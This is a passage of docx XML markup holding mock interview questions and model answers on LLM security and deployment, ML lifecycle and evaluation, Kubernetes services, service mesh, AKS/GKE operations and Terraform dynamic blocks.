        </w:rPr>
        <w:t>Q5. Mock 50 focus - prompt injection and data leakage: How would you protect an LLM application from malicious input, unsafe tool calls, PII leakage, and retrieved-document injection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat user input and retrieved documents as untrusted data, never as instructions. Use strong system prompts, clear delimiters, content filtering, tool allowlists, schema validation, and permission checks outside the model. Do not give the model broad credentials; tools should use least privilege and require confirmation for destructive actions. Redact PII/secrets before prompts and logs, restrict which documents can be retrieved by user/team authorization, and monitor for injection patterns. The strongest control is not a clever prompt; it is limiting what the model can access or do if the prompt is bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Mock 50 focus - self-hosted vs managed LLMs: How would you choose between Vertex AI/Gemini, OpenAI API, and self-hosted vLLM or Ollama on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use managed APIs such as Vertex AI/Gemini or OpenAI when you want fast adoption, strong model quality, low platform operations, and managed scaling. Use self-hosted vLLM/TGI/Ollama on Kubernetes when data residency, cost at scale, latency control, custom models, or offline/private operation matter enough to justify GPU operations. Compare model quality, token cost, p95 latency, throughput, privacy, compliance, operational burden, GPU availability, autoscaling, and fallback options. Many production platforms use both: managed APIs for high-quality general tasks and self-hosted models for private, high-volume, or cost-sensitive workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Mock 50 focus - fine-tuning vs RAG: When would you fine-tune an LLM instead of using RAG or prompt engineering, and what operational risks would you manage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Fine-Tuning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use prompt engineering for behavior or formatting changes when the base model already knows the task. Use RAG when answers need current, private, or auditable knowledge from documents. Use fine-tuning when you need the model to learn a repeatable style, domain-specific classification, extraction format, or task behavior from many examples. Fine-tuning adds risks: dataset quality, bias, overfitting, model versioning, evaluation, rollback, cost, and retraining. It is not a good way to inject frequently changing factual knowledge; RAG is usually better for that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Mock 50 focus - machine learning fundamentals: Explain supervised learning, unsupervised learning, and reinforcement learning with practical examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Machine Learning Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Supervised learning trains on labeled examples, such as predicting churn from customer records or classifying incidents as high or low priority. Unsupervised learning finds patterns without labels, such as clustering customers, detecting anomalies, or reducing dimensionality. Reinforcement learning trains an agent to take actions and receive rewards or penalties, such as game playing, robotics, or policy optimization. In interviews, connect the learning type to the data available: labels imply supervised, hidden structure implies unsupervised, and sequential decisions with rewards imply reinforcement learning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Mock 50 focus - ML lifecycle: Walk through the end-to-end machine learning lifecycle from problem framing to data collection, training, deployment, monitoring, and retraining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Machine Learning Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with problem framing: define business objective, prediction target, success metric, constraints, and risk. Then collect and validate data, engineer features, split train/validation/test sets, train candidate models, evaluate offline metrics and business relevance, package the model, register it with lineage, deploy through canary/shadow/A/B if needed, and monitor latency, errors, drift, data quality, prediction quality, and business KPIs. Retraining should be triggered by schedule, new labels, drift, or performance degradation, but production promotion still needs validation and rollback controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Mock 50 focus - feature engineering: What is feature engineering, why does it matter, and how do you avoid training-serving skew?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Feature Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature engineering means transforming raw data into useful model inputs: aggregations, encodings, normalization, time-window features, text embeddings, missing-value handling, and domain-specific signals. It matters because model quality often depends more on useful features than algorithm choice. To avoid training-serving skew, reuse the same feature definitions in training and inference, version features, validate schemas, monitor freshness, and use a feature store or shared transformation library where appropriate. Always record feature version and data time range in model lineage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Mock 50 focus - ML model evaluation: How would you choose metrics such as accuracy, precision, recall, F1, ROC-AUC, RMSE, and business KPIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Model Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose metrics based on problem type and business cost of errors. Accuracy is useful only when classes are balanced and errors have similar cost. Precision matters when false positives are expensive, such as unnecessary fraud blocks. Recall matters when false negatives are expensive, such as missing fraud or incidents. F1 balances precision and recall. ROC-AUC helps compare ranking ability across thresholds. RMSE/MAE fit regression problems. Always connect technical metrics to business KPIs such as revenue, risk, support tickets, latency, or user experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Mock 50 focus - overfitting and underfitting: How do you detect overfitting or underfitting, and what actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Model Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Overfitting means the model performs well on training data but poorly on validation or production data. Detect it through train-validation metric gaps, unstable cross-validation, and poor generalization. Fix it with more data, regularization, simpler models, dropout, pruning, early stopping, or better validation splits. Underfitting means the model is too simple or lacks useful features, causing poor training and validation performance. Fix it with better features, a more expressive model, longer training, less regularization, or improved data quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Mock 50 focus - model drift: Explain data drift, concept drift, prediction drift, and how you would monitor and respond to each in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data drift is a change in input feature distribution. Concept drift is a change in the relationship between inputs and target, so old patterns no longer predict outcomes. Prediction drift is a change in model output distribution. Monitor feature distributions, schema, missing values, embedding distribution, prediction distribution, delayed ground-truth metrics, and business KPIs. Respond based on impact: investigate data pipeline changes, compare against seasonality, retrain with fresh data, roll back feature/model changes, or adjust thresholds. Do not retrain automatically on every drift alert without validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Mock 50 focus - model deployment strategy: How would you deploy a new ML model safely using canary, shadow, A/B testing, rollback, and champion-challenger patterns?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use shadow deployment when you want the new model to receive live inputs without affecting users. Use canary to send a small percentage of traffic and watch latency, errors, model metrics, and business KPIs. Use A/B testing to compare business outcomes between model versions. Use champion-challenger when a candidate must beat the current production model before promotion. Keep rollback simple by retaining prior model artifacts and routing config. For ML, rollback criteria must include business and quality metrics, not only infrastructure health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Mock 50 focus - bad model incident: A model is technically healthy but business KPIs suddenly drop after release. How would you investigate and mitigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Open an incident and check the release timeline, model version, feature version, traffic split, customer segments, and business metric drop. Compare old vs new predictions, input distributions, confidence scores, feature freshness, training-serving skew, and any upstream data changes. If the drop aligns with the model release, pause rollout or roll back to the previous champion while investigation continues. Preserve evidence: model version, data sample, metrics, and traces. After mitigation, update evaluation gates so the missed business failure becomes a pre-production or canary check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Mock 50 focus - ML platform design: What shared platform capabilities would you build for data scientists and ML engineers to ship models safely and repeatedly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build shared capabilities across the lifecycle: data access patterns, data validation, feature store or reusable feature pipelines, experiment tracking, model registry, pipeline orchestration, CI/CD/CT, containerized training, model serving, monitoring, drift detection, approval workflows, rollback, security, and cost visibility. The platform should provide golden paths so teams do not reinvent infrastructure, but still allow flexibility for different model types. Strong platform answers include reproducibility, lineage, tenant isolation, least privilege, observability, and self-service developer experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 51 - Kubernetes Services, Service Mesh, AKS/GKE, and Terraform Loops Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is kube-proxy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-proxy is the Kubernetes node-level networking component that watches Services and Endpoints/EndpointSlices, then programs forwarding rules so traffic sent to a Service virtual IP or NodePort is routed to one of the matching backend Pods. Depending on the mode, it uses iptables, IPVS, or platform-specific mechanisms to implement service load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Suppose there are two Pods running in different namespaces. What DNS name would you use so that one Pod can communicate with the other?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the Service DNS name, not the raw Pod IP. For a Service named backend in namespace app2, a Pod in another namespace can call backend.app2.svc.cluster.local, or usually backend.app2. The full Kubernetes DNS pattern is &lt;service-name&gt;.&lt;namespace&gt;.svc.cluster.local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. There are two applications, a frontend application and a backend application, running in two different Pods. What configuration would you write so that the frontend application starts only after the backend application is up and running?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes you should not rely on strict Pod startup order for application correctness. Expose the backend through a Service, configure readiness/startup probes on the backend, and make the frontend either retry until the backend Service is ready or use an initContainer that waits for the backend endpoint before starting the main frontend container. For production, readiness probes plus application-level retry/backoff are safer than only an initContainer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. We mostly follow blue-green deployment. How do you divert traffic from the Blue environment to the Green environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run both blue and green versions in parallel, validate the green version, then switch the traffic routing layer from blue to green. In Kubernetes this is commonly done by updating the Service selector from labels like version: blue to version: green, or by changing an Ingress/service mesh/load balancer route. Keep blue running briefly so rollback is just switching the selector or route back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How do Kubernetes Services work, and when would you use ClusterIP, NodePort, LoadBalancer, or headless Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Kubernetes Service gives stable networking in front of dynamic Pods by selecting ready endpoints through labels and exposing them through a stable DNS name and virtual IP. Use ClusterIP for internal service-to-service traffic, NodePort mainly for simple external exposure or as a building block behind a load balancer, LoadBalancer when the cloud provider should provision an external or internal load balancer, and a headless Service when clients need direct Pod DNS records, often for StatefulSets or service discovery systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Scenario: A frontend Pod cannot reach a backend Service in another namespace. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with the DNS name and namespace: the frontend should call something like backend.backend-namespace.svc.cluster.local. Then verify the Service exists, its selector matches the backend Pod labels, endpoints or EndpointSlices are populated, backend Pods are Ready, and NetworkPolicies are not blocking traffic. Use kubectl get svc,endpoints,endpointslice,pods -n &lt;namespace&gt;, test DNS with nslookup from a debug Pod, and test connectivity with curl or nc before checking app logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is service mesh, and when would you introduce Istio or Anthos Service Mesh into a Kubernetes platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A service mesh adds a dedicated traffic, security, and observability layer for service-to-service communication, usually through sidecars or ambient data-plane components. Introduce Istio or Anthos Service Mesh when teams need mTLS, traffic splitting, retries, timeouts, circuit breaking, request-level telemetry, or consistent policy across many services. Avoid adding it only because it is fashionable; it increases operational complexity, so the use case should justify the extra control plane, debugging model, and upgrade process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Scenario: After enabling service mesh mTLS, some services start failing. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether both client and server workloads are injected into the mesh, whether PeerAuthentication is set to STRICT or PERMISSIVE, whether DestinationRules use the correct TLS mode, and whether any non-mesh workload is still calling a STRICT mTLS service. Then inspect sidecar logs, Envoy config, service identity, certificates, and policies. A practical mitigation is to roll out mTLS namespace by namespace in PERMISSIVE mode first, observe traffic, then move to STRICT once all callers are mesh-aware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you implement canary or blue-green deployment using Kubernetes Services and service mesh traffic splitting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: With plain Kubernetes Services, blue-green can be done by running two versions with different labels and switching the Service selector from blue to green after validation. With a service mesh, keep both versions behind the same Service and use routing rules such as Istio VirtualService and DestinationRule to split traffic by percentage, header, user segment, or version. For production, combine this with metrics-based rollback, readiness probes, dashboards, and a fast route or selector rollback path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is AKS, and how is it different from GKE from an operations point of view?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/AKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AKS is Azure Kubernetes Service, the managed Kubernetes offering on Azure. Operationally, both AKS and GKE manage the control plane and integrate with their cloud networking, identity, storage, monitoring, and load-balancing ecosystems. The differences are mainly in platform integration: AKS uses Azure Resource Manager, Azure CNI, managed identities, Azure Monitor, and Azure Load Balancer/Application Gateway patterns, while GKE integrates with Google IAM, VPC-native networking, Cloud Operations, Cloud Load Balancing, and Workload Identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Scenario: An AKS or GKE node upgrade is blocked or causing disruption. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/AKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check PodDisruptionBudgets, max unavailable settings, node surge settings, unavailable replicas, DaemonSets, local storage usage, long terminationGracePeriodSeconds, pods without safe eviction, cluster autoscaler limits, quota, and node pool health. For disruption, check whether readiness probes, rollout strategy, replica count, topology spread, and PDBs allow enough capacity during upgrade. The safe design is separate node pools, surge upgrades, tested maintenance windows, and workload disruption budgets aligned with real availability needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What is a dynamic block in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A dynamic block in Terraform generates repeatable nested blocks inside a resource, data source, provider, or provisioner from a collection. It is useful when the nested block count or contents are driven by input variables, for example generating multiple ingress rules, egress rules, disks, or lifecycle rules without copying the same nested block many times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the use case of a dynamic block?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
